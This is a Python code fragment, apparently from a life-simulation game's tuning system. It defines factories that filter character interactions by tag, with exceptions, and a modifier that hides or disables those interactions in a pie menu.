class AffordanceTagFactory(HasTunableSingletonFactory, AutoFactoryInit):
FACTORY_TUNABLES = {'interaction_tags': TunableTags(description='\n Affordances with any of these tags to affect.\n ', filter_prefixes=('Interaction',)), 'exceptions': TunableList(description='\n Affordances that are not affected even if they have the specified\n tags.\n ', tunable=TunableAffordanceListReference(pack_safe=True))}
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
affordance_exceptions = frozenset(affordance for exception_list in self.exceptions for affordance in exception_list)
self.affordance_exceptions = affordance_exceptions or None
def __call__(self, affordance):
if affordance.interaction_category_tags & self.interaction_tags and (self.affordance_exceptions is None or affordance not in self.affordance_exceptions):
return False
return True
class PieMenuModifier(HasTunableSingletonFactory, AutoFactoryInit, BaseGameEffectModifier):
FACTORY_TUNABLES = {'affordance_filter': TunableVariant(description='\n Affordances this modifier affects.\n ', by_affordance_filter=AffordanceFilterFactory.TunableFactory(), by_tags=AffordanceTagFactory.TunableFactory(), default='by_affordance_filter'), 'suppression_tooltip': OptionalTunable(description='\n If supplied, interactions are disabled with this tooltip.\n Otherwise, interactions are hidden.\n ', tunable=TunableLocalizedStringFactory(description='Reason of failure.'))}
def __init__(self, **kwargs):
super().__init__(GameEffectType.PIE_MENU_MODIFIER, **kwargs)
def affordance_is_allowed(self, affordance):
return self.affordance_filter(affordance)
| 2.046875
| 2
|